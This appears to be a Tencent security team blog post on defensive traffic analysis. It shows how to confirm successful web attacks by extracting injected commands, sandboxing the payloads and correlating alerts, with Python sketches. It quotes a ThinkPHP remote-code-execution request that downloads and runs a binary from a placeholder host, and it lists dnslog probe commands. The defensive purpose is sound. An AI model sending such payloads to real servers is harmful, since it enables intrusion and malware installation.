Threat discovery under automated data analysis

2022-06-24 05:22:00 【Tencent Security Emergency Response Center】

Background

I don't remember exactly how long ago it was, probably at 15:37:25.181 on September 3, 2020, that I wrote an article about data analysis in the information-gathering process (link to the original text). Some readers may ask why I remember such a precise time so clearly. Because I made it up. Down to business: both articles are about data analysis. The previous one analyzed the data used during an attack; this one is its sister piece and focuses on the data analysis used in security operations, that is, enterprise defense.

Breaking the ice!

Before we start, let's look at an attack HTTP request (source and destination IPs and other details omitted). Readers may want to think about it first: what useful information can we obtain or reconstruct from this HTTP request?

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Host:x.x.x.x

Some readers will focus on the content of the HTTP request itself, such as the attack technique, and experienced security engineers can even point out that it targets a ThinkPHP vulnerability. In fact, much more information is hidden below the waterline of the iceberg. To dig it out, we first need to reason through every path the attack could take as it evolves. I have simplified this into the following figure:

In general, the information we get falls into two categories. Direct information is the basic information about this HTTP request, including the time, the attack technique, and so on. Indirect information covers everything that may appear as the attack evolves afterwards, including processes, network communications, and so on.

Why do this? Because in actual operations we found that it is difficult to close the loop on an alert by relying on direct information alone or on indirect information alone. Take the direct information of this attack as an example: our WAF raises countless alerts like the one above every day, and they are basically not actionable. If we apply automated data analysis to direct and indirect information together, we can filter out false positives and achieve high-accuracy alerting.

So what?

We have just covered why automated data analysis is worth doing; I believe readers are more curious about how to do it. My team is the traffic analysis team, so using traffic to implement automated data analysis is a major focus of this article.

We will keep using the example above. The first question to think about is: "Why can't direct information form an effective alert?" Simply put, we don't know whether the attack was executed successfully. So we shift our view to what happens afterwards: if indirect information supports successful execution, we have a complete chain of evidence. It is like hearing that your ex-girlfriend was proposed to on the Qixi Festival. You may want to know whether the proposal succeeded, and although you were not present, you can judge it by whether a wedding follows in the near future or whether a marriage certificate has been obtained. Here I have simply listed the events that can serve as evidence in the case above:

● The server executes the download file command

● The server is downloading or has downloaded the file

● The server is executing or has executed the file

● External communication exists during the execution of this file

In summary, if any of the above behaviors can be confirmed on top of the attack behavior, we can confirm that the attack succeeded. The benefits are obvious: using data analysis instead of relying only on traditional rules reduces rule maintenance, improves generality, and makes alert operations more accurate.
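
The evidence check described above can be sketched roughly as follows. This is only a minimal illustration, not the team's actual implementation: the HostEvent structure, the evidence labels, and the sample IP addresses are all assumptions made up for the example.

```python
from dataclasses import dataclass

# Labels for the four evidence types listed above (names are hypothetical).
EVIDENCE_KINDS = {
    "download_command_executed",
    "file_downloaded",
    "file_executed",
    "external_communication",
}


@dataclass
class HostEvent:
    host: str    # server that reported the event
    kind: str    # event label, ideally one of EVIDENCE_KINDS
    detail: str  # free-form description


def supporting_evidence(target_host, events):
    """Return events on the attacked host that count as evidence of success."""
    return [e for e in events if e.host == target_host and e.kind in EVIDENCE_KINDS]


# Made-up sample data: one relevant event and one unrelated event.
events = [
    HostEvent("10.0.0.5", "file_downloaded", "/tmp/.bom"),
    HostEvent("10.0.0.9", "user_login", "ssh login"),
]
evidence = supporting_evidence("10.0.0.5", events)
print("attack confirmed" if evidence else "unconfirmed")
```

Any single matching event is treated as confirmation here, which mirrors the "any of the above behaviors" wording; a real pipeline would presumably also bound the events in time.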

How do you do it?

The concrete process is a bit like putting an elephant in a refrigerator. The first step is to extract the complete command string and perform a simple analysis of it. The second step is to run sandbox analysis on the file (if there is one), extract rules that match the current attack type, and push the extracted rules to the corresponding security devices. The third step is to correlate the data from each security device, such as NTA, EDR, and the scanner, to put the alerts into operation.

There are several ways to carry out the first step, extracting the complete command string. The first is more traditional and the idea is relatively simple: parse the complete HTTP request, split the parameters and their values into a dictionary (whether they come from GET parameters, POST content, or cookies), and then extract common commands from the parameter values with suitable regular expressions. This is simple, but missed detections and false positives are comparatively prominent. The second way is to collect many similar requests to the same interface, including both malicious requests and normal ones, and extract the command string from the difference between a normal request and an attack request. This produces relatively few false positives, but the cost is relatively high.

wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp
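
The first, regex-based approach could look something like the sketch below. It uses only the Python standard library; the COMMAND_RE pattern, the function names, and the shortened, percent-encoded request target are assumptions for illustration, and a production pattern list would need to be much broader.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Hypothetical pattern: a few common commands, captured up to the next quote.
COMMAND_RE = re.compile(r"\b(?:wget|curl|chmod|bash|sh|nc)\b[^'\"]*")


def extract_params(request_target, body="", cookie=""):
    """Merge query string, form body, and cookies into one {name: value} dict."""
    params = dict(parse_qsl(urlsplit(request_target).query, keep_blank_values=True))
    params.update(parse_qsl(body, keep_blank_values=True))
    for pair in cookie.split(";"):
        if "=" in pair:
            name, value = pair.split("=", 1)
            params[name.strip()] = value.strip()
    return params


def extract_commands(params):
    """Return the command-like substring of every parameter value that has one."""
    found = []
    for value in params.values():
        match = COMMAND_RE.search(value)
        if match:
            found.append(match.group(0).strip())
    return found


# Shortened, percent-encoded variant of the request shown earlier.
target = (
    "/index.php?function=call_user_func_array&vars[0]=shell_exec"
    "&vars[1][]=%27wget%20http://x.x.x.x/bins/bom.x86%20-O%20/tmp/.bom%3B"
    "%20chmod%20777%20/tmp/.bom%3B%20/tmp/.bom%20thinkphp%27"
)
print(extract_commands(extract_params(target)))
```

Note that the value `shell_exec` is not matched because `sh` is not a whole word there, which hints at how fragile keyword patterns are and why this approach is prone to both misses and false positives.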

Once the command string has been extracted, the rest is relatively simple, and again there are two ways. The first is to use shlex, the lexical analysis library that ships with Python, and call its split method directly to tokenize the command. Alternatively, you can use regular expressions for pattern matching. Either way, you then extract the URL, the commands, and so on.

['wget', 'http://x.x.x.x/bins/bom.x86', '-O', '/tmp/.bom;', 'chmod', '777', '/tmp/.bom;', '/tmp/.bom', 'thinkphp']
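
In the token list above, shlex.split leaves the `;` separators attached to the preceding token. One possible refinement, sketched here under the assumption of Python 3.8 or later, is to use the shlex.shlex class with punctuation_chars so that separators become their own tokens and the string can be grouped into individual commands. The helper names split_commands and extract_urls are made up for this example.

```python
import shlex

SEPARATORS = ";&|"


def split_commands(command_string):
    """Tokenize a shell command string and group tokens into one list per command."""
    lexer = shlex.shlex(command_string, posix=True, punctuation_chars=SEPARATORS)
    lexer.whitespace_split = True  # keep URLs and paths as single tokens
    commands, current = [], []
    for token in lexer:
        if set(token) <= set(SEPARATORS):  # a separator such as ';' or '&&'
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def extract_urls(commands):
    """Collect every token that looks like an HTTP(S) URL."""
    return [t for cmd in commands for t in cmd if t.startswith(("http://", "https://"))]


cmd = "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp"
parsed = split_commands(cmd)
print(parsed)
print(extract_urls(parsed))
```

Grouping by command makes it straightforward to read off the program name (the first token of each group) as well as the download URL and the dropped file path.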

The second step is to download the remote file referenced by the command string, analyze the executable in a sandbox, and extract the IOCs that correspond to the file. The corresponding detection rules can also be pushed to the various security devices.

The third step is relatively simple. It mainly involves obtaining the relevant process, network, and other data; some requests that need secondary confirmation can also be submitted to the scanner. Finally, whether the correlation succeeds is confirmed by methods such as time proximity and command similarity. Graph-based correlation can also be used here, but I will not go into detail.
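
As a rough illustration of correlating by time proximity and command similarity, the sketch below compares an alert against host process events using difflib.SequenceMatcher from the standard library. The record fields, the 60-second window, and the 0.8 similarity threshold are all assumptions chosen for the example, not values from the original article.

```python
from difflib import SequenceMatcher


def correlate(alert, process_events, max_gap_seconds=60, min_similarity=0.8):
    """Return (event, similarity) pairs that plausibly result from the alert."""
    matches = []
    for event in process_events:
        gap = event["time"] - alert["time"]
        # Same host, and the process started shortly after the request arrived.
        if event["host"] != alert["host"] or not 0 <= gap <= max_gap_seconds:
            continue
        similarity = SequenceMatcher(None, alert["command"], event["cmdline"]).ratio()
        if similarity >= min_similarity:
            matches.append((event, similarity))
    return matches


# Made-up sample records; times are epoch seconds.
alert = {
    "host": "10.0.0.5",
    "time": 1000.0,
    "command": "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom",
}
process_events = [
    {"host": "10.0.0.5", "time": 1002.5, "cmdline": "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom"},
    {"host": "10.0.0.5", "time": 1003.0, "cmdline": "ls -la /var/log"},
    {"host": "10.0.0.9", "time": 1001.0, "cmdline": "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom"},
]
for event, similarity in correlate(alert, process_events):
    print(event["cmdline"], similarity)
```

A fuzzy ratio is used instead of strict equality because the command line recorded on the host may differ slightly from the string seen in traffic, for example in quoting or shell wrapping.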

Put it to use!

With this small case you can basically understand the idea behind the data analysis. Of course, different scenarios call for different correlations and outputs. In short, the idea is to analyze and reason about every stage of the attack behavior. Finally, building on the above, here are some small cases of data analysis applied in practice.

Case 1

Through data analysis we can obtain the dnslog domain names, IPs, and other indicators used for blind (out-of-band) verification, and feed them back into security policies. For example, the following patterns are commonly used in blind verification:

nslookup  ad323xzxs[.]qq[.]com
ping  ad323xzxs[.]qq[.]com
dig  ad323xzxs[.]qq[.]com
dig ad323xzxs @x.x.x.x
curl http://qq[.]com/i/c204f5/5dig/hgl5/
curl ad323xzxs[.]qq[.]com
......

We first obtain all the domain names stored in the database through the first step, then process them according to the different patterns to obtain the root domain names the attacker uses for verification. For example, for the pattern nslookup ad323xzxs.qq.com, we can break down every domain name to get its root domain, group by root domain, and finally reach a result with a simple quantitative judgment. The resulting domain names can then be fed back into the policies, as the accompanying figure shows.
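
A minimal sketch of the root-domain grouping might look like this. It is an illustration under several assumptions: the HOST_RE pattern only handles commands that carry a fully qualified hostname, root_domain naively keeps the last two labels (a real implementation would need a public suffix list), the "quantitative judgment" is taken to be a count of distinct hostnames per root, and the sample domains under .example are made up.

```python
import re
from collections import defaultdict

# Hypothetical pattern: hostname argument of nslookup/ping/dig/curl.
HOST_RE = re.compile(
    r"(?:nslookup|ping|dig|curl)\s+(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})"
)


def root_domain(hostname):
    """Naive root domain: the last two labels (ignores suffixes like .com.cn)."""
    return ".".join(hostname.lower().rstrip(".").split(".")[-2:])


def candidate_roots(commands, min_hosts=3):
    """Group hostnames by root domain and keep roots with many distinct hosts."""
    hosts_by_root = defaultdict(set)
    for command in commands:
        match = HOST_RE.search(command)
        if match:
            host = match.group(1).lower()
            hosts_by_root[root_domain(host)].add(host)
    return {
        root: len(hosts)
        for root, hosts in hosts_by_root.items()
        if len(hosts) >= min_hosts
    }


# Made-up extracted commands using reserved example domains.
commands = [
    "nslookup  ad323xzxs.dnslog.example",
    "ping  k9f2a.dnslog.example",
    "curl http://zz81q.dnslog.example/",
    "curl http://www.shop.example/index.html",
    "dig ad323xzxs @x.x.x.x",
]
print(candidate_roots(commands))
```

Counting distinct hostnames rather than raw requests reflects the fact that blind-verification platforms hand out many random subdomains under one root, while ordinary sites are usually reached through a handful of names.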

Case 2

Through data analysis, requests that suggest a vulnerability can be submitted to the scanner for scanning, and the spread of new vulnerabilities can be discovered. As mentioned above, comparing a normal request with a request that carries a payload yields the attack payload, and after this step we also have the normal request and the location of the injection point. We can then score the likelihood of a vulnerability according to the payload; for example, behavior that looks like dumping a database can be given a high score. Finally, high-scoring requests are submitted directly to the scanner for a secondary scan. The same principle applies to discovering the spread of new vulnerabilities, although the specific handling is slightly different.
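
The comparison and scoring could be sketched as below. This is a simplified illustration that only diffs query-string parameters; the KEYWORD_SCORES weights, the function names, and the sample requests are assumptions invented for the example.

```python
from urllib.parse import parse_qsl, urlsplit

# Hypothetical keyword weights; database-dumping patterns score highest.
KEYWORD_SCORES = {
    "union select": 5,
    "information_schema": 5,
    "sleep(": 3,
    "wget ": 4,
}


def query_params(request_target):
    """Parse the query string of a request target into a dict."""
    return dict(parse_qsl(urlsplit(request_target).query, keep_blank_values=True))


def diff_requests(normal_target, attack_target):
    """Return {injection point: payload} for parameters that differ from normal."""
    normal = query_params(normal_target)
    attack = query_params(attack_target)
    return {name: value for name, value in attack.items() if normal.get(name) != value}


def score_payload(payload):
    """Sum the weights of all suspicious keywords found in the payload."""
    lowered = payload.lower()
    return sum(score for keyword, score in KEYWORD_SCORES.items() if keyword in lowered)


# Made-up sample requests to the same interface.
normal = "/item.php?id=42&lang=en"
attack = "/item.php?id=42%20UNION%20SELECT%20name,pass%20FROM%20users&lang=en"

injected = diff_requests(normal, attack)
for name, payload in injected.items():
    print(name, score_payload(payload), payload)
```

The parameter name that differs gives the injection point, the differing value gives the payload, and requests whose score exceeds a chosen threshold would be the ones handed to the scanner.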

The end!

That brings this article to an end. You are welcome to get in touch by message or comment.

About the Aegis traffic security analysis team

The Aegis traffic security analysis team belongs to the Tencent Security Platform Department. Drawing on the department's 15 years of security experience in building a company-level security system, the team focuses on building and deploying traffic-based attack detection, intrusion detection, traffic blocking, and threat intelligence. It keeps mining security risks in traffic and broadening application scenarios, and combines big data, AI, and other cutting-edge technologies to build a defense-in-depth system for network traffic.
